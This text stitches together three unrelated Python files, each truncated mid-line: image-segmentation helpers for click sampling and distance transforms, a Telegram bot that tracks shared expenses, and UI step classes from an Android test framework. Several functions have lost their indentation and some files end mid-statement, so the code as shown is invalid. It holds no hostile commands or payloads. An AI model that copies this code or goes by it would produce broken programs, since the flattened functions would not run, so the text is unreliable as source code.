def load_flow_from_flo(fn, flow_as_angle):
  """Load an optical-flow field from a .flo file and rescale it."""
  flow = read_flo_file(fn)
  flow = _postprocess_flow(flow, flow_as_angle)
  return flow
def get_masked_image(img, mask, multiplier=0.6):
  """
  :param img: The image to be masked (RGB; converted via rgb2hsv internally).
  :param mask: Binary mask to be applied. The object should be represented by 1 and the background by 0
  :param multiplier: Floating point multiplier that decides the colour of the mask.
  :return: Masked image
  """
  # Build a pure-green overlay image and transfer its hue (and a scaled
  # saturation) onto the object pixels of the input, giving a green tint.
  img_mask = np.zeros_like(img)
  indices = np.where(mask == 1)
  img_mask[indices[0], indices[1], 1] = 1
  img_mask_hsv = color.rgb2hsv(img_mask)
  img_hsv = color.rgb2hsv(img)
  img_hsv[indices[0], indices[1], 0] = img_mask_hsv[indices[0], indices[1], 0]
  img_hsv[indices[0], indices[1], 1] = img_mask_hsv[indices[0], indices[1], 1] * multiplier
  return color.hsv2rgb(img_hsv)
def get_masked_image_hsv(img_hsv, mask, multiplier=0.6):
  """
  :param img_hsv: The hsv image to be masked.
  :param mask: Binary mask to be applied. The object should be represented by 1 and the background by 0
  :param multiplier: Floating point multiplier that decides the colour of the mask.
  :return: Masked image (converted back to RGB by hsv2rgb).
  """
  img_mask_hsv = np.zeros_like(img_hsv)
  result_image = np.copy(img_hsv)
  indices = np.where(mask == 1)
  # HSV triple of a green overlay (hue 1/3 = green); only H and S are
  # copied onto the object pixels below, the V channel is left untouched.
  img_mask_hsv[indices[0], indices[1], :] = [0.33333333333333331, 1.0, 0.0039215686274509803]
  result_image[indices[0], indices[1], 0] = img_mask_hsv[indices[0], indices[1], 0]
  result_image[indices[0], indices[1], 1] = img_mask_hsv[indices[0], indices[1], 1] * multiplier
  return color.hsv2rgb(result_image)
def create_distance_transform(img, label, raw_label, strategy, ignore_classes, old_label=None):
  """Build negative (u0) and positive (u1) click distance-transform maps.

  Returns (u0, u1, total number of sampled clicks) with the maps as float32.
  NOTE(review): `old_label` is accepted but not forwarded to either sampler,
  and instance id is hard-coded to 1 — confirm both are intentional.
  """
  u0, neg_clicks = get_neg_dst_transform(raw_label[:, :, 0], img, 1, strategy, ignore_classes)
  u1, pos_clicks = get_pos_dst_transform(label[:, :, 0], img, 1)
  num_clicks = len(neg_clicks) + len(pos_clicks)
  return u0.astype(np.float32), u1.astype(np.float32), num_clicks
def geo_dist(img, pts):
  """Approximate geodesic distance from seed points *pts* over image *img*.

  The per-pixel cost is 1 + Sobel gradient magnitude of the blurred image;
  distances are propagated with alternating directional sweeps (Cython
  `sweep`) until the largest update is below 1.0 or 40 sweeps have run.
  """
  # Import these only on demand since pyximport interferes with pycocotools
  import pyximport
  pyximport.install()
  from datasets.Util import sweep
  img = np.copy(img) / 255.0
  #G = nd.gaussian_gradient_magnitude(img, 1.0)
  img = cv2.GaussianBlur(img, (3,3), 1.0)
  #G = cv2.Laplacian(img,cv2.CV_64F)
  sobelx = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=5)
  sobely = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=5)
  sobel_abs = cv2.addWeighted(sobelx, 0.5, sobely, 0.5, 0)
  # Per-pixel L2 magnitude over the three colour channels.
  sobel_abs = (sobel_abs[:, :, 0] ** 2 + sobel_abs[:, :, 1] ** 2 + sobel_abs[:, :, 2] ** 2) ** (1 / 2.0)
  #G = (G[:, :, 0] ** 2 + G[:, :, 1] ** 2 + G[:, :, 2] ** 2) ** (1 / 2.0)
  # c = 1 + G * 200
  # c = G / np.max(G)
  #c=sobel_abs / 255.0
  c=1+sobel_abs
  # plt.imshow(sobel_abs)
  # plt.colorbar()
  # plt.show()
  # Initialise distances to a large value everywhere except the seeds.
  dt = np.zeros_like(c)
  dt[:] = 1000
  dt[pts] = 0
  # The four flipped views share storage with dt/c, so each sweep updates
  # the same arrays from a different corner.
  sweeps = [dt, dt[:, ::-1], dt[::-1], dt[::-1, ::-1]]
  costs = [c, c[:, ::-1], c[::-1], c[::-1, ::-1]]
  for i, (a, c) in enumerate(it.cycle(list(zip(sweeps, costs)))):
    # print i,
    if sweep.sweep(a, c) < 1.0 or i >= 40:
      break
  return dt
def get_pos_dst_transform(label_unmodified, img, instance, old_label=None, dt_method="edt"):
  """Sample positive clicks on the target instance and build their distance transform.

  :param label_unmodified: label image containing all instances.
  :param img: input image (used only for geodesic distance transforms).
  :param instance: instance id to treat as foreground.
  :param old_label: previous binary mask, if available; clicks are then sampled
    on the newly-added region (label - old_label) when that region is non-empty.
  :param dt_method: "edt" for euclidean or "geodesic" for geodesic distance.
  :return: (distance transform map, list of sampled click locations)
  """
  label = np.where(label_unmodified == instance, 1, 0)
  # If an old label is available, then sample positive clicks on the difference
  # between the two (only when the difference has at least one object pixel).
  if old_label is not None:
    # np.maximum clamps pixels that existed only in old_label to 0. The
    # original np.max(0, ...) passed the array as the `axis` argument and
    # raised as soon as old_label was supplied.
    label = np.maximum(label - old_label, 0) if np.any((label - old_label) == 1) else label
  # Leave a margin around the object boundary; fall back to the full mask if
  # erosion removes the object entirely.
  img_area = morphology.binary_erosion(label, morphology.diamond(D_MARGIN))
  img_area = img_area if len(np.where(img_area == 1)[0]) > 0 else np.copy(label)
  # Set of ground truth pixels as (row_indices, col_indices).
  O = np.where(img_area == 1)
  # Randomly sample the number of positive clicks; zero when the object is
  # empty. Note np.where always returns a length-2 tuple, so emptiness must be
  # checked on the index arrays, not on the tuple itself.
  num_clicks_pos = [0] if len(O[0]) == 0 else random.sample(list(range(1, Npos + 1)), 1)
  pts = get_sampled_locations(O, img_area, num_clicks_pos)
  u1 = get_distance_transform(pts, img_area, img=img, dt_method=dt_method)
  return u1, pts
def get_neg_dst_transform(label_unmodified, img, instance, strategy, ignore_classes, old_label=None, dt_method="edt"):
  """
  :param img: input image: this would be used to calculate geodesic distance.
  :param ignore_classes: class ids that must never receive negative clicks (strategy 2).
  :param dt_method: 'edt' for euclidean distance and 'geodesic' for geodesic distance.
  :param old_label: old label, if available (currently unused here).
  :param label_unmodified: unmodified label which contains all the instances
  :param instance: The instance number to segment
  :param strategy: value in [1,2,3]
              1 - Generate random clicks from the background, which is D pixels away from the object.
              2 - Generate random clicks on each negative object.
              3 - Generate random clicks around the object boundary.
  :return: (negative distance transform map, list of sampled click locations)
  """
  label = np.where(label_unmodified == instance, 1, 0)
  g_c = get_image_area_to_sample(label)
  pts = []
  if strategy in [1, 3]:
    if strategy == 1:
      num_neg_clicks = random.sample(list(range(0, Nneg1 + 1)), 1)
      pts = get_sampled_locations(np.where(g_c == 1), g_c, num_neg_clicks)
    else:
      # First negative click is randomly sampled in g_c
      pts = get_sampled_locations(np.where(g_c == 1), g_c, [1])
      g_c_copy = np.copy(g_c)
      g_c_copy[list(zip(*(val for val in pts)))] = 0
      dt = distance_transform_edt(g_c_copy)
      # Sample successive points using p_next = arg max f(p_ij | s0 U g), where p_ij in g_c, s0 is the set of all
      # sampled points, and 'g' is the complementary set of g_c
      for _ in range(2, Nneg3 + 1):
        if np.max(dt) > 0:
          rows, cols = np.where(dt == np.max(dt))
          # zip(rows, cols)[0] is invalid on Python 3 (zip returns an
          # iterator); take the first maximiser from the index arrays directly.
          row, col = rows[0], cols[0]
          pts.append((row, col))
          # Suppress a (2*D)-sized window around the chosen point so the next
          # click lands far away.
          x_min = max(0, row - D)
          x_max = min(row + D, dt.shape[0])
          y_min = max(0, col - D)
          y_max = min(col + D, dt.shape[1])
          dt[x_min:x_max, y_min:y_max] = 0
  elif strategy == 2:
    # Get all negative object instances.
    instances = np.setdiff1d(np.unique(label_unmodified), np.append(instance, ignore_classes))
    num_neg_clicks = random.sample(list(range(0, Nneg2 + 1)), 1)
    for i in instances:
      g_c = np.where(label_unmodified == i)
      label = np.where(label_unmodified == i, 1, 0)
      pts_local = get_sampled_locations(g_c, np.copy(label), num_neg_clicks)
      pts = pts + pts_local
  u0 = get_distance_transform(pts, label, img=img, dt_method=dt_method)
  return u0, pts
def get_distance_transform(pts, label, img=None, dt_method="edt"):
dt = np.ones_like(label)
if len(pts) > 0:
if dt_method == "geodesic" and img is not None:
# dt = np.where(dt != 0, 1e5, 0)
dt = geo_dist(img, list(zip(*(val for val in pts))))
else:
dt[list(zip(*(val for val in pts)))] = 0
dt = distance_transform_edt(dt)
return dt
else:
# This is important since we divide it by 255 while normalizing the inputs.
return dt * 255
def get_sampled_locations(sample_locations, img_area, num_clicks):
  """Randomly draw up to num_clicks[0] pixel locations, spaced roughly D/2 apart.

  :param sample_locations: (row_indices, col_indices) tuple, e.g. np.where output.
  :param img_area: binary map of the valid sampling area; a copy is masked as we go.
  :param num_clicks: one-element list holding the number of clicks to draw.
  :return: list of [row, col] click positions.
  """
  half_window = int(D / 2)
  area = np.copy(img_area)
  clicks = []
  for _ in range(num_clicks[0]):
    candidates = list(zip(sample_locations[0], sample_locations[1]))
    # NOTE(review): a single remaining candidate is never sampled (`> 1`);
    # behaviour preserved as-is from the original.
    if len(candidates) > 1:
      [row, col] = random.sample(candidates, 1)[0]
      clicks.append([row, col])
      # Suppress a window around the chosen pixel so the next click is drawn
      # at least ~D/2 away, then recompute the remaining candidates.
      r_lo = max(0, row - half_window)
      r_hi = min(row + half_window, area.shape[0])
      c_lo = max(0, col - half_window)
      c_hi = min(col + half_window, area.shape[1])
      area[r_lo:r_hi, c_lo:c_hi] = 0
      sample_locations = np.where(area == 1)
  return clicks
def get_image_area_to_sample(img):
  """
  calculate set g_c, which has two properties
  1) They represent background pixels
  2) They are within a certain distance to the object
  :param img: Image that represents the object instance
  :return: binary map with 1 on background pixels within D pixels of the
    (dilated) object, 0 elsewhere
  """
  #TODO: In the paper 'Deep Interactive Object Selection', they calculate g_c first based on the original object instead
  # of the dilated one.
  # Dilate the object by d_margin pixels to extend the object boundary
  img_area = np.copy(img)
  img_area = morphology.binary_dilation(img_area, morphology.diamond(D_MARGIN)).astype(np.uint8)
  # Background = complement of the dilated object ...
  g_c = np.logical_not(img_area).astype(int)
  # ... restricted to pixels no farther than D from the object boundary.
  g_c[np.where(distance_transform_edt(g_c) > D)] = 0
  return g_c
def load_clustering_labels(clustering_path):
from Log import log
import pickle
with open(clustering_path, "rb") as f:
x = pickle.load(f)
labels = x["class_labels"]
print("class labels from", clustering_path, ":", labels, file=log.v1)
assert labels[0] == "outliers", labels
clustering_labels = list(labels[1:])
n_classes = len(clustering_labels)
label_map = {}
for idx, label in enumerate(clustering_labels):
label_map[idx] | |
<reponame>KanegaeGabriel/SplitXPBot
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from os import environ
import logging
import auth # Telegram Bot Token
from DBM import DBM
from Transaction import Transaction
from utils import *
def kill(bot, update):
    """Debug command: drop ALL database tables via the global `dbm`.

    NOTE(review): unlike /reset this performs no canRunAdmin check — confirm
    the handler is either unregistered in production or intentionally open.
    """
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    s = dbm.killAllTables()
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def help(bot, update): # /help
    """Handle /help: send the Markdown-formatted command reference.

    NOTE: shadows the `help` builtin, kept for handler-registration
    compatibility. The last three entries of `h` rely on implicit adjacent
    string concatenation (no trailing commas); since the list is joined with
    "", the rendered output is identical either way.
    """
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    h = [
        "*{U}* commands can be used by anyone. *{A}* can be used only by group admins. ",
        "If used in a private chat, all commands can be used.\n",
        "\n",
        "*{U}* `/start`\n",
        "> Starts the bot and initializes the database.\n",
        "\n",
        "*{U}* `/help`\n",
        "> Shows this message.\n",
        "\n",
        "*{A}* `/reset`\n",
        "> Resets the database.\n",
        "\n",
        "*{U}* `/gaveTo (@user) (amount) [description]`\n",
        "> Records that you gave `amount` to `@user`.\n",
        "\n",
        "*{U}* `/gaveMe (@user) (amount) [description]`\n",
        "> Records that `@user` gave `amount` to you.\n",
        "\n",
        "*{A}* `/whoGaveWho (@userA) (@userB) (amount) [description]`\n",
        "> Records that `@userA` gave `amount` to `@userB`.\n",
        "\n",
        "*{U}* `/total [@user]`\n",
        "> Shows how much `@user` owes and is owed. Defaults to you.\n",
        "\n",
        "*{U}* `/recent [@user|all] [n]`\n",
        "> Lists the `n` most recent transactions involving `@user|all`.\n",
        "\n",
        "*{A}* `/config (GMToffset) (currency)`\n",
        "> Configures the bot to your liking:\n"
        "   `GMToffset`: Hours to add/sub from the GMT timezone. e.g. `3`, `-2`.\n"
        "   `currency`: Currency symbol to use. e.g. `$`, `US$`.\n"
    ]
    s = "".join(h)
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def start(bot, update): # /start
    """Handle /start: create this chat's database entry and send a greeting."""
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    h = [
        "Hi! I am SplitXPBot! I'm here to manage your shared expenses! ",
        "I can be used in a group chat or in a private one. :)\n",
        "\n",
        "Type `/help` to see the available commands.\n"
        "\n",
        "Also, be sure to configure me to your liking with `/config`!\n",
    ]
    # Initialise per-chat storage before greeting.
    dbm.newChat(chatID)
    s = "".join(h)
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def reset(bot, update): # /reset
    """Handle /reset: wipe this chat's transactions (group admins only).

    The chat's config survives: the stored currency is passed to resetChat.
    """
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    GMToffset, currency = dbm.getConfig(chatID)
    if not canRunAdmin:
        s = "You are not allowed to use that command. Please ask a group admin."
        bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
        return
    # `is None` instead of `== None` (PEP 8 E711). Both values are unset only
    # when /start was never run for this chat.
    if GMToffset is None and currency is None:
        s = "I couldn't find some important data. Are you sure you have already run `/start`?"
        bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
        return
    s = dbm.resetChat(chatID, currency)
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def config(bot, update, args): # /config (GMToffset) (currency)
    """Handle /config: validate and store the chat's GMT offset and currency.

    Validation order: arg count, offset is an int, offset within +/-12,
    currency symbol at most 5 characters.
    """
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    if len(args) != 2:
        s = "Command usage: `/config (GMT offset) (currency)`\n"
        s += "   `GMT offset`: Hours to add/sub from the GMT timezone. e.g. `3`, `-2`.\n"
        s += "   `currency`: Currency symbol to use. e.g. `$`, `US$`.\n"
    elif not isInt(args[0]):
        s = "Invalid GMT offset. Please give me an integer value."
    elif abs(int(args[0])) > 12:
        s = "Invalid GMT offset. Please give me a value between -12 and 12."
    elif len(args[1]) > 5:
        s = "Your currency symbol is too long. Please don't go over 5 characters."
    else:
        GMToffset = int(args[0])
        currency = args[1]
        s = dbm.setConfig(chatID, GMToffset, currency)
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def gaveTo(bot, update, args): # /gaveTo (@user) (amount) [description]
    """Handle /gaveTo: record that the sender gave `amount` to `@user`.

    NOTE(review): near-duplicate of gaveMe (only the Transaction argument
    order differs) — candidate for a shared helper.
    """
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    GMToffset, currency = dbm.getConfig(chatID)
    if GMToffset == None and currency == None:
        s = "I couldn't find some important data. Are you sure you have already run `/start`?"
        bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
        return
    # Accept comma as the decimal separator.
    if len(args) > 1: args[1] = args[1].replace(",", ".")
    if myself == "None":
        s = "How come you don't have a Telegram username? Please create one."
    elif len(args) < 2:
        s = "Command usage: `/gaveTo (@user) (amount) [description]`"
    elif args[0][0] != "@":
        s = "Please call a user by their Telegram username, starting with @."
    elif not isFloat(args[1]):
        s = "The amount has to be a number."
    elif float(args[1]) < 0.01:
        s = "Only positive amounts, please!"
    elif args[0].replace("@", "") == myself:
        s = "You can't make a transaction with yourself!"
    else:
        user = args[0].replace("@", "")
        amount = float(args[1])
        # Truncate long descriptions to 50 chars (47 + "...").
        description = " ".join(args[2:])
        if len(description) > 50:
            description = description[:(50-3)] + "..."
        s = dbm.saveTransaction(chatID, Transaction(myself, user, amount, description), GMToffset, currency)
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def gaveMe(bot, update, args): # /gaveMe (@user) (amount) [description]
    """Handle /gaveMe: record that `@user` gave `amount` to the sender.

    Mirror of gaveTo with the Transaction giver/receiver swapped.
    """
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    GMToffset, currency = dbm.getConfig(chatID)
    if GMToffset == None and currency == None:
        s = "I couldn't find some important data. Are you sure you have already run `/start`?"
        bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
        return
    # Accept comma as the decimal separator.
    if len(args) > 1: args[1] = args[1].replace(",", ".")
    if myself == "None":
        s = "How come you don't have a Telegram username? Please create one."
    elif len(args) < 2:
        s = "Command usage: `/gaveMe (@user) (amount) [description]`"
    elif args[0][0] != "@":
        s = "Please call a user by their Telegram username, starting with @."
    elif not isFloat(args[1]):
        s = "The amount has to be a number."
    elif float(args[1]) < 0.01:
        s = "Only positive amounts, please!"
    elif args[0].replace("@", "") == myself:
        s = "You can't make a transaction with yourself!"
    else:
        user = args[0].replace("@", "")
        amount = float(args[1])
        # Truncate long descriptions to 50 chars (47 + "...").
        description = " ".join(args[2:])
        if len(description) > 50:
            description = description[:(50-3)] + "..."
        s = dbm.saveTransaction(chatID, Transaction(user, myself, amount, description), GMToffset, currency)
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def whoGaveWho(bot, update, args): # /whoGaveWho (@userA) (@userB) (amount) [description]
    """Handle /whoGaveWho (admin only): record that `@userA` gave `amount` to `@userB`.

    NOTE(review): unlike gaveTo/gaveMe there is no userA == userB check —
    confirm self-transactions are intentionally allowed here.
    """
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    GMToffset, currency = dbm.getConfig(chatID)
    if not canRunAdmin:
        s = "You are not allowed to use that command. Please ask a group admin."
        bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
        return
    if GMToffset == None and currency == None:
        s = "I couldn't find some important data. Are you sure you have already run `/start`?"
        bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
        return
    # Accept comma as the decimal separator.
    if len(args) > 2: args[2] = args[2].replace(",", ".")
    if myself == "None":
        s = "How come you don't have a Telegram username? Please create one."
    elif len(args) < 3:
        s = "Command usage: `/whoGaveWho (@userA) (@userB) (amount) [description]`"
    elif args[0][0] != "@" or args[1][0] != "@":
        s = "Please call a user by their Telegram username, starting with @."
    elif not isFloat(args[2]):
        s = "The amount has to be a number."
    elif float(args[2]) < 0.01:
        s = "Only positive amounts, please!"
    else:
        userA = args[0].replace("@", "")
        userB = args[1].replace("@", "")
        amount = float(args[2])
        # Truncate long descriptions to 50 chars (47 + "...").
        description = " ".join(args[3:])
        if len(description) > 50:
            description = description[:(50-3)] + "..."
        s = dbm.saveTransaction(chatID, Transaction(userA, userB, amount, description), GMToffset, currency)
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def total(bot, update, args): # /total [@user]
    """Handle /total: show balances for `@user`, for everyone ("all"),
    or for the sender when no argument is given."""
    printCommandExecution(bot, update)
    myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
    GMToffset, currency = dbm.getConfig(chatID)
    if GMToffset == None and currency == None:
        s = "I couldn't find some important data. Are you sure you have already run `/start`?"
        bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
        return
    if len(args) > 0 and args[0] != "all" and args[0][0] != "@":
        s = "Please call a user by their Telegram username, starting with @."
    else:
        if len(args) > 0 and args[0] == "all":
            s = dbm.printAllTotals(chatID, currency)
        elif len(args) > 0:
            user = args[0].replace("@", "")
            s = dbm.printTotal(chatID, user, currency)
        else:
            # No argument: default to the sender.
            s = dbm.printTotal(chatID, myself, currency)
    bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def recent(bot, update, args): # /recent [@user|all] [n]
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
GMToffset, currency = dbm.getConfig(chatID)
if GMToffset == None and currency == None:
s = "I couldn't find some important data. Are you sure you have already run `/start`?"
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
if myself == "None":
s = "How come you don't have a Telegram username? Please create one."
elif len(args) > 0 and (args[0] != "all" and args[0][0] != "@"):
s = "Please call a user by their Telegram username, starting with @."
elif len(args) > 1 and not isInt(args[1]):
s = "The amount has to be a number."
else:
if len(args) == 0:
s = dbm.printRecent(chatID, myself, 5, GMToffset, currency)
elif len(args) == 1:
user = args[0].replace("@", "")
s = dbm.printRecent(chatID, | |
<reponame>wangji1/test-framework-and-suites-for-android
#!/usr/bin/env python
"""
Copyright (C) 2018 Intel Corporation
?
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
?
http://www.apache.org/licenses/LICENSE-2.0
?
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
?
SPDX-License-Identifier: Apache-2.0
"""
# standard libraries
import time
import traceback
from testlib.scripts.android.ui.ui_step import step as ui_step
from testlib.scripts.android.ui import ui_utils
from testlib.utils.connections.adb import Adb
from testlib.base.base_step import BlockingError
from testlib.base.abstract.abstract_step import devicedecorator, applicable, notapplicable
class dump(ui_step):
    """ description:
            dumps the ui objects to stdout or a file
        usage:
            ui_steps.dump() - dumps to stdout
            ui.steps.dump("/path/to/out_file.xml") - dumps to file
        tags:
            ui, android, dump, xml, file
    """
    out_file = None
    def __init__(self, out_file=None, **kwargs):
        ui_step.__init__(self, **kwargs)
        self.out_file = out_file
    def do(self):
        if self.out_file:
            self.uidevice.dump(out_file=self.out_file,
                               compressed=False, serial=self.serial)
        else:
            # print as a function call: valid on Python 2 (parenthesised
            # expression, single argument) and required on Python 3, where the
            # original `print x` statement is a SyntaxError.
            print(self.uidevice.dump(compressed=False, serial=self.serial))
    def check_condition(self):
        # Dumping has no verifiable UI effect; always report success.
        return True
@devicedecorator
class set_pin_screen_lock():
    """ description:
            sets screen lock method to PIN <selected PIN>
            if already set to PIN, it will skip
            (concrete behavior supplied per-device via @devicedecorator)
        usage:
            ui_steps.set_pin_screen_lock(pin = "1234")()
        tags:
            ui, android, click, button
    """
    pass
@devicedecorator
class remove_pin_screen_lock():
    """ description:
            removes the PIN screen lock set with set_pin_screen_lock
            (original docstring was copied from set_pin_screen_lock; concrete
            behavior supplied per-device via @devicedecorator)
        usage:
            ui_steps.remove_pin_screen_lock(pin = "1234")()
        tags:
            ui, android, click, button
    """
    pass
@devicedecorator
class open_security_settings():
    """ description:
            Opens the Security Settings page using an intent.
            (concrete behavior supplied per-device via @devicedecorator)
        usage:
            ui_steps.open_security_settings()()
        tags:
            ui, android, settings, security, intent
    """
    pass
@devicedecorator
class open_users_settings():
    """ description:
            Opens the Users Settings page using an intent.
            (original docstring was copied from open_security_settings;
            concrete behavior supplied per-device via @devicedecorator)
        usage:
            ui_steps.open_users_settings()()
        tags:
            ui, android, settings, users, intent
    """
    pass
@devicedecorator
class am_start_command():
    """ description:
            Starts an activity via an `am start` command; the concrete intent
            is supplied by the device-specific implementation.
            (original docstring was copied from wifi_steps.open_wifi_settings
            — confirm intended contract against the device implementations)
        usage:
            ui_steps.am_start_command()()
        tags:
            ui, android, intent
    """
    pass
@devicedecorator
class am_stop_package():
    """ Description:
            Executes command 'adb shell am force-stop [package_name]'. Pass
            package name to package_name parameter.
            (concrete behavior supplied per-device via @devicedecorator)
        Usage:
            ui_steps.am_stop_package(serial=serial,
                        package_name="com.android.settings")()
        tags:
            ui, android, stop, package
    """
    pass
class click_view(ui_step):
    """ description:
            clicks a view <view>
            if <view_to_check> given it will check that the object
            identified by <view_to_check>:
            - appeared if <view_presence> is True
            - disappeared if <view_presence> is False
        usage:
            ui_steps.click_button(view_to_find = {"resourceId":
                "com.intel.TelemetrySetup:id/button_allow"},
                view_to_check = {"text": "OK"})()
        tags:
            ui, android, click, button
    """

    def __init__(self, view, view_to_check=None,
                 view_presence=True, wait_time=10000, **kwargs):
        ui_step.__init__(self, **kwargs)
        self.view = view
        self.view_to_check = view_to_check
        self.view_presence = view_presence
        self.wait_time = wait_time
        # Build the pass/fail messages once, from the same context pair.
        msg_ctx = (view, view_to_check)
        self.set_errorm(
            "", "Could not click view {0} checking {1}".format(*msg_ctx))
        self.set_passm("View {0} clicked checking {1}".format(*msg_ctx))

    def do(self):
        # Click the already-resolved view object and wait for the UI to settle.
        self.view.click.wait()

    def check_condition(self):
        # Nothing to verify when no check view was supplied.
        if self.view_to_check is None:
            return True
        selector = self.uidevice(**self.view_to_check)
        if self.view_presence:
            # Expect the check view to appear within the timeout.
            return selector.wait.exists(timeout=self.wait_time)
        # Expect the check view to disappear within the timeout.
        return selector.wait.gone(timeout=self.wait_time)
# TODO: rename with open_quick_settings_with_swipe
# add desciption
@devicedecorator
class open_notifications_menu():
    """ description:
            opens the notifications menu; concrete behaviour is supplied
            per-device by @devicedecorator (see TODO above about renaming
            to open_quick_settings_with_swipe)
        tags:
            ui, android, notifications
    """
    pass
class click_xy(ui_step):
    """ description:
            clicks on the devices on x, y
        usage:
            ui_steps.click_xy(x = 100, y = 100)()
        tags:
            ui, android, click, coords
    """

    def __init__(self, x, y, view_to_check=None, use_adb=True, **kwargs):
        self.x = x
        self.y = y
        self.view_to_check = view_to_check
        self.use_adb = use_adb
        ui_step.__init__(self, **kwargs)
        self.step_data = False
        self.set_passm("Coordinates ({0} x {1}) clicked".format(x, y))
        self.set_errorm(
            "", "Could not click coordinates ({0} x {1})".format(x, y))

    def do(self):
        if not self.use_adb:
            # Tap through the uiautomator connection.
            self.step_data = self.uidevice.click(self.x, self.y)
            return
        # Inject the tap via `adb shell input tap`; a truthy command
        # output counts as success.
        adb_connection = Adb(serial=self.serial)
        output = adb_connection.run_cmd(
            "input tap {0} {1}".format(self.x, self.y))
        self.step_data = bool(output)

    def check_condition(self):
        # A failed tap fails the step outright.
        if not self.step_data:
            return self.step_data
        # No verification view supplied: the tap alone is success.
        if self.view_to_check is None:
            return True
        # Refresh the hierarchy before probing for the expected view.
        self.uidevice.wait.update()
        return self.uidevice(**self.view_to_check).wait.exists(timeout=1000)
class long_click(ui_step):
    """ description:
            long clicks a button identified by <view_to_find>
            if <view_to_check> given it will check that the object
            identified by <view_to_check>:
            - appeared if <view_presence> is True
            - disappeared if <view_presence> is False
        usage:
            ui_steps.long_click(view_to_find = {"resourceId":
                "com.intel.TelemetrySetup:id/button_allow"},
                view_to_check = {"text": "OK"})()
        tags:
            ui, android, long_click, button
    """
    # Class-level defaults, overwritten per instance in __init__.
    view_to_find = None
    view_to_check = None
    view_presence = None

    def __init__(self, view_to_find, view_to_check=None,
                 view_presence=True, **kwargs):
        ui_step.__init__(self, **kwargs)
        self.view_to_find = view_to_find
        self.view_to_check = view_to_check
        self.view_presence = view_presence

    def do(self):
        # Resolve the selector and perform the long press.
        self.uidevice(**self.view_to_find).long_click()

    def check_condition(self):
        if self.view_to_check is None:
            # Nothing to verify.
            return True
        appeared = self.uidevice(**self.view_to_check).wait.exists(timeout=1000)
        if self.view_presence:
            return appeared
        return not appeared
class edit_text(ui_step):
    """ description:
            puts value in text view identified by view_to_find
        usage:
            ui_steps.edit_text(view_to_find = {"resourceId":
                               "com.intel.TelemetrySetup:id/text"},
                               value = "text to input")()
            scroll - scroll for the desired view and then edit the text.
            clear_text - clear the text before writing 'value'(default is True)
        tags:
            ui, android, edit, text
    """
    # Class-level defaults, overwritten per instance in __init__.
    view_to_find = None
    value = None
    is_password = None

    def __init__(self, view_to_find, value, is_password=False, scroll=False, clear_text=True, **kwargs):
        ui_step.__init__(self, **kwargs)
        self.view_to_find = view_to_find
        self.value = value
        # Fixed: this line previously contained an unresolved "<PASSWORD>"
        # redaction placeholder (a syntax error); it must store the parameter.
        self.is_password = is_password
        self.scroll = scroll
        self.clear_text = clear_text
        self.set_passm("Edit {0} with {1}".format(view_to_find, value))
        self.set_errorm(
            "", "Could not edit {0} with {1}".format(view_to_find, value))

    def do(self):
        self.uidevice.wait.idle()
        # Optionally scroll the target into view first.
        if self.scroll and self.uidevice(className="android.widget.ScrollView",
                                         scrollable=True).wait.exists(timeout=1000):
            self.uidevice(scrollable=True).scroll.to(**self.view_to_find)
        text_field = self.uidevice(**self.view_to_find)
        # Clear existing text; bail out if clearing stops making progress
        # (some fields keep a hint text that never empties).
        while self.clear_text and text_field.info['text']:
            before = text_field.info['text']
            text_field.clear_text()
            after = text_field.info['text']
            if before == after:
                break
        if text_field.info["className"] != "com.android.keyguard.PasswordTextView":
            text_field.set_text(self.value)
        else:
            # Keyguard PIN widget refuses set_text; type each digit through
            # the on-screen keypad instead.
            for character in self.value:
                click_button(serial=self.serial,
                             view_to_find={"text": character,
                                           "resourceId": "com.android.systemui:id/digit_text"})()

    def check_condition(self):
        # Password fields mask their content, so the typed value cannot be
        # read back; trust do() in that case.
        if self.is_password:
            return True
        return (self.uidevice(textContains=self.value).wait.exists(timeout=1000))
class scroll_up_to_view(ui_step):
    """ description:
            scrolls up on until <view_to_check> is shown using swipe
            You can scroll "down" if you overwrite ey to <300.
        usage:
